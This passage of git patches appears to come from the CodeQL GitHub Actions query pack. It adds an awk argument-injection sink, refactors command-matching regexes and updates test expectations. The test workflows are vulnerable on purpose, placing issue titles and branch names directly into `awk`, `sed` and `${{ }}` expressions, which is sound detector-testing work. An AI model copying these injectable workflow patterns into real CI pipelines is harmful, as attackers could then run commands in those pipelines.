toJson(github.event.issue.title) | semmle.label | toJson(github.event.issue.title) | | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/test9.yml:43:42:43:80 | toJson(github.event.issue.title) | semmle.label | toJson(github.event.issue.title) | +| .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | @@ -328,6 +334,12 @@ subpaths | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | +| .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | From eb66114d8bf0d0bc5f273f1d2b8e70873a464c31 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 11 Jul 2024 11:35:44 +0200 Subject: [PATCH 399/707] feat(models): New ArgInj sink --- ql/lib/ext/config/argument_injection_sinks.yml | 1 + .../Security/CWE-094/.github/workflows/arg_injection.yml | 5 +---- .../Security/CWE-094/ArgumentInjectionCritical.expected | 3 +++ .../Security/CWE-094/ArgumentInjectionMedium.expected | 2 ++ 4 files changed, 7 insertions(+), 4 deletions(-) diff --git a/ql/lib/ext/config/argument_injection_sinks.yml b/ql/lib/ext/config/argument_injection_sinks.yml index 727c982d2ec2..4588af0bf00f 100644 --- a/ql/lib/ext/config/argument_injection_sinks.yml +++ b/ql/lib/ext/config/argument_injection_sinks.yml @@ -4,5 +4,6 @@ extensions: extensible: argumentInjectionSinksDataModel # https://gtfobins.github.io/ data: + - ["(awk)(.*?)", 2, 3] - ["(sed)(.*?)", 2, 3] diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml index 19435af16d3b..0956aea61bdb 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml @@ -14,7 +14,4 @@ jobs: - run: sed "s/FOO/$TITLE/g" - run: echo "foo" | sed "s/FOO/$TITLE/g" > bar - run: echo $(echo "foo" | sed "s/FOO/$TITLE/g" > bar) - - - - + - run: awk "BEGIN {$TITLE}" diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected index 21483efe36ca..13f4954eac37 100644 --- a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected @@ -2,13 +2,16 @@ edges | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | provenance | | | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | provenance | | | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | provenance | | +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | provenance | | nodes | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | semmle.label | sed "s/FOO/$TITLE/g" | | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | semmle.label | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | +| .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | semmle.label | awk "BEGIN {$TITLE}" | subpaths #select | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | sed | | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | sed | | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | sed | +| .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | awk | diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected index c2ff2885a995..67f728705f41 100644 --- a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected @@ -2,10 +2,12 @@ edges | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | provenance | | | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | provenance | | | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | provenance | | +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | provenance | | nodes | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | semmle.label | sed "s/FOO/$TITLE/g" | | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | semmle.label | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | +| .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | semmle.label | awk "BEGIN {$TITLE}" | subpaths #select From f4581d0aa5e5b1dc0decd50e4ffa39af3e1da758 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 11 Jul 2024 11:36:18 +0200 Subject: [PATCH 400/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 79545959a7df..e5e89afc471e 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.17 +version: 0.1.18 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 30ed4dc6dae9..db9bdecf8b87 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.17 +version: 0.1.18 groups: [actions, queries] suites: codeql-suites extractor: javascript From 7a54170b3129ea5facabf0e3fb2a0b98fcebc480 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 11 Jul 2024 12:59:34 +0200 Subject: [PATCH 401/707] feat(ext): Move regexp delimiters to Config.qll --- ql/lib/codeql/actions/config/Config.qll | 41 +++++++++++-------- .../actions/security/PoisonableSteps.qll | 11 +---- 2 files changed, 27 insertions(+), 25 deletions(-) diff --git a/ql/lib/codeql/actions/config/Config.qll b/ql/lib/codeql/actions/config/Config.qll index 8d97e63786b5..3b273302fec3 100644 --- a/ql/lib/codeql/actions/config/Config.qll +++ b/ql/lib/codeql/actions/config/Config.qll @@ -51,7 +51,11 @@ predicate externallyTriggerableEventsDataModel(string event) { * - regexp: Regular expression for matching poisonable commands */ predicate poisonableCommandsDataModel(string regexp) { - Extensions::poisonableCommandsDataModel(regexp) + exists(string sub_regexp | + Extensions::poisonableCommandsDataModel(sub_regexp) and + // find regexp + regexp = "(^|\\b|\\s+)" + sub_regexp + "(\\s|;|\\||\\)|`|-|&&|[a-zA-Z]|$)" + ) } /** @@ -61,7 +65,26 @@ predicate poisonableCommandsDataModel(string regexp) { * - group: Script capture group number for the regular expression */ predicate poisonableLocalScriptsDataModel(string regexp, int group) { - Extensions::poisonableLocalScriptsDataModel(regexp, group) + exists(string sub_regexp | + Extensions::poisonableLocalScriptsDataModel(sub_regexp, group) and + // capture regexp + regexp = ".*(^|;|\\$\\(|`|\\||&&|\\|\\|)\\s*" + sub_regexp + "\\s*(;|\\||\\)|`|-|&&|$|\\|\\|).*" + ) +} + +/** + * MaD models for arguments to commands that execute the given argument. + * Fields: + * - regexp: Regular expression for matching argument injections. + * - command_group: capture group for the command. + * - argument_group: capture group for the argument. + */ +predicate argumentInjectionSinksDataModel(string regexp, int command_group, int argument_group) { + exists(string sub_regexp | + Extensions::argumentInjectionSinksDataModel(sub_regexp, command_group, argument_group) and + // capture regexp + regexp = ".*(^|;|\\$\\(|`|\\||&&|\\|\\|)\\s*" + sub_regexp + "\\s*(;|\\||\\)|`|-|&&|$|\\|\\|).*" + ) } /** @@ -82,17 +105,3 @@ predicate poisonableActionsDataModel(string action) { predicate untrustedEventPropertiesDataModel(string property, string kind) { Extensions::untrustedEventPropertiesDataModel(property, kind) } - -/** - * MaD models for arguments to commands that execute the given argument. - * Fields: - * - regexp: Regular expression for matching argument injections. - * - command_group: capture group for the command. - * - argument_group: capture group for the argument. - */ -predicate argumentInjectionSinksDataModel(string regexp, int command_group, int argument_group) { - exists(string sub_regexp | - Extensions::argumentInjectionSinksDataModel(sub_regexp, command_group, argument_group) and - regexp = ".*(^|;|\\$\\(|`|\\||&&)\\s*" + sub_regexp + "\\s*(;|\\||\\)|`|-|&&|$).*" - ) -} diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index 34246fa4e8f7..6a218ac08f1e 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -18,12 +18,7 @@ class PoisonableCommandStep extends PoisonableStep, Run { PoisonableCommandStep() { exists(string regexp | poisonableCommandsDataModel(regexp) and - exists( - this.getScript() - .splitAt("\n") - .trim() - .regexpFind("(^|\\b|\\s+)" + regexp + "(\\s|;|\\||\\)|`|-|&&|[a-zA-Z]|$)", _, _) - ) + exists(this.getScript().splitAt("\n").trim().regexpFind(regexp, _, _)) ) } } @@ -46,9 +41,7 @@ class LocalScriptExecutionRunStep extends PoisonableStep, Run { LocalScriptExecutionRunStep() { exists(string line, string regexp, int group | line = this.getScript().splitAt("\n").trim() | poisonableLocalScriptsDataModel(regexp, group) and - cmd = - line.regexpCapture(".*(^|;|\\$\\(|`|\\||&&)\\s*" + regexp + "\\s*(;|\\||\\)|`|-|&&|$).*", - group) + cmd = line.regexpCapture(regexp, group) ) } From 89024ad6048ba00083b23b4c8946ec5cd8df4c7d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 11 Jul 2024 22:58:20 +0200 Subject: [PATCH 402/707] fix(models): Reuse command delimiter regexps --- ql/lib/codeql/actions/config/Config.qll | 19 ++++++++++++++----- .../security/ArtifactPoisoningQuery.qll | 5 ++++- .../actions/security/PoisonableSteps.qll | 8 +++++--- ql/lib/ext/config/poisonable_steps.yml | 16 ++++++++-------- .../.github/workflows/poisonable_steps.yml | 1 + .../ArgumentInjectionCritical.expected | 2 ++ .../CWE-094/ArgumentInjectionMedium.expected | 1 + 7 files changed, 35 insertions(+), 17 deletions(-) diff --git a/ql/lib/codeql/actions/config/Config.qll b/ql/lib/codeql/actions/config/Config.qll index 3b273302fec3..efd8b26510b7 100644 --- a/ql/lib/codeql/actions/config/Config.qll +++ b/ql/lib/codeql/actions/config/Config.qll @@ -45,6 +45,12 @@ predicate externallyTriggerableEventsDataModel(string event) { Extensions::externallyTriggerableEventsDataModel(event) } +private string commandLauncher() { result = ["", "sudo\\s+", "su\\s+", "xvfb-run\\s+"] } + +private string commandPrefixDelimiter() { result = "(^|;|\\$\\(|`|\\||&&|\\|\\|)\\s*" } + +private string commandSuffixDelimiter() { result = "\\s*(;|\\||\\)|`|&&|\\|\\||$)" } + /** * MaD models for poisonable commands * Fields: @@ -54,7 +60,8 @@ predicate poisonableCommandsDataModel(string regexp) { exists(string sub_regexp | Extensions::poisonableCommandsDataModel(sub_regexp) and // find regexp - regexp = "(^|\\b|\\s+)" + sub_regexp + "(\\s|;|\\||\\)|`|-|&&|[a-zA-Z]|$)" + regexp = + commandPrefixDelimiter() + commandLauncher() + sub_regexp + "(.*?)" + commandSuffixDelimiter() ) } @@ -64,11 +71,13 @@ predicate poisonableCommandsDataModel(string regexp) { * - regexp: Regular expression for matching poisonable local scripts * - group: Script capture group number for the regular expression */ -predicate poisonableLocalScriptsDataModel(string regexp, int group) { +predicate poisonableLocalScriptsDataModel(string regexp, int command_group) { exists(string sub_regexp | - Extensions::poisonableLocalScriptsDataModel(sub_regexp, group) and + Extensions::poisonableLocalScriptsDataModel(sub_regexp, command_group) and // capture regexp - regexp = ".*(^|;|\\$\\(|`|\\||&&|\\|\\|)\\s*" + sub_regexp + "\\s*(;|\\||\\)|`|-|&&|$|\\|\\|).*" + regexp = + ".*" + commandPrefixDelimiter() + commandLauncher() + sub_regexp + commandSuffixDelimiter() + + ".*" ) } @@ -83,7 +92,7 @@ predicate argumentInjectionSinksDataModel(string regexp, int command_group, int exists(string sub_regexp | Extensions::argumentInjectionSinksDataModel(sub_regexp, command_group, argument_group) and // capture regexp - regexp = ".*(^|;|\\$\\(|`|\\||&&|\\|\\|)\\s*" + sub_regexp + "\\s*(;|\\||\\)|`|-|&&|$|\\|\\|).*" + regexp = ".*" + commandPrefixDelimiter() + sub_regexp + commandSuffixDelimiter() + ".*" ) } diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index d2853591d61e..dd409bdbae28 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -255,7 +255,10 @@ class ArtifactPoisoningSink extends DataFlow::Node { ) and ( not poisonable instanceof LocalScriptExecutionRunStep or - poisonable.(LocalScriptExecutionRunStep).getCommand().matches(download.getPath() + "%") + poisonable + .(LocalScriptExecutionRunStep) + .getCommand() + .matches(["./", ""] + download.getPath() + "%") ) ) } diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index 6a218ac08f1e..5dd0081f61e9 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -39,9 +39,11 @@ class LocalScriptExecutionRunStep extends PoisonableStep, Run { string cmd; LocalScriptExecutionRunStep() { - exists(string line, string regexp, int group | line = this.getScript().splitAt("\n").trim() | - poisonableLocalScriptsDataModel(regexp, group) and - cmd = line.regexpCapture(regexp, group) + exists(string line, string regexp, int command_group | + line = this.getScript().splitAt("\n").trim() + | + poisonableLocalScriptsDataModel(regexp, command_group) and + cmd = line.regexpCapture(regexp, command_group) ) } diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index 07fc7c7af73d..7f07f696445c 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -57,12 +57,12 @@ extensions: extensible: poisonableLocalScriptsDataModel data: # TODO: It could also be in the form of `dir/cmd` - - ["(\\.\\/)(.*)", 3] - - ["(\\.\\s+)(.*)", 3] # eg: . venv/bin/activate - - ["(source|sh|bash|zsh|fish)\\s+(.*)", 3] - - ["(node)\\s+(.*)(\\.js|\\.ts)", 3] - - ["(python)\\s+(.*)\\.py", 3] - - ["(ruby)\\s+(.*)\\.rb", 3] - - ["(go)\\s+(generate|run)\\s+(.*)\\.go", 4] - - ["(dotnet)\\s+(.*)\\.csproj", 3] + - ["(\\.\\/[a-zA-Z0-9\\-_\\./]+)(.*?)", 2] + - ["(\\.\\s+[a-zA-Z0-9\\-_\\./]+)(.*?)", 2] # eg: . venv/bin/activate + - ["(source|sh|bash|zsh|fish)\\s+(.*?)", 3] + - ["(node)\\s+(.*?)(\\.js|\\.ts)(.*?)", 3] + - ["(python)\\s+(.*?)\\.py(.*?)", 3] + - ["(ruby)\\s+(.*?)\\.rb(.*?)", 3] + - ["(go)\\s+(generate|run)\\s+(.*?)\\.go(.*?)", 4] + - ["(dotnet)\\s+(.*?)\\.csproj(.*?)", 3] diff --git a/ql/test/library-tests/.github/workflows/poisonable_steps.yml b/ql/test/library-tests/.github/workflows/poisonable_steps.yml index 37ec9c9ff716..fad7001ad5a9 100644 --- a/ql/test/library-tests/.github/workflows/poisonable_steps.yml +++ b/ql/test/library-tests/.github/workflows/poisonable_steps.yml @@ -38,3 +38,4 @@ jobs: - run: sed -f config file.txt > foo.txt - run: echo "foo" | awk -f ./config.awk > foo.txt - run: gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo + - run: ./foo/cmd diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected index 13f4954eac37..b5d25bf0d135 100644 --- a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected @@ -9,9 +9,11 @@ nodes | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | semmle.label | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | semmle.label | awk "BEGIN {$TITLE}" | +| .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | semmle.label | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | subpaths #select | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | sed | | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | sed | | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | sed | | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | awk | +| .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | sed | diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected index 67f728705f41..dfbf87174cc1 100644 --- a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected @@ -9,5 +9,6 @@ nodes | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | semmle.label | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | semmle.label | awk "BEGIN {$TITLE}" | +| .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | semmle.label | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | subpaths #select From 3f8a791b2e5b7a7a82a22b475999c58f56d05112 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 11 Jul 2024 22:59:20 +0200 Subject: [PATCH 403/707] fix(queries): Improve Argument Injection query Add GITHUB_HEAD_REF as a source --- .../security/ArgumentInjectionQuery.qll | 29 +++++++++++++++++-- .../security/UntrustedCheckoutQuery.qll | 2 +- .../.github/workflows/arg_injection.yml | 5 ++++ 3 files changed, 32 insertions(+), 4 deletions(-) diff --git a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll index bf29a1c8458f..c13db5b81275 100644 --- a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll +++ 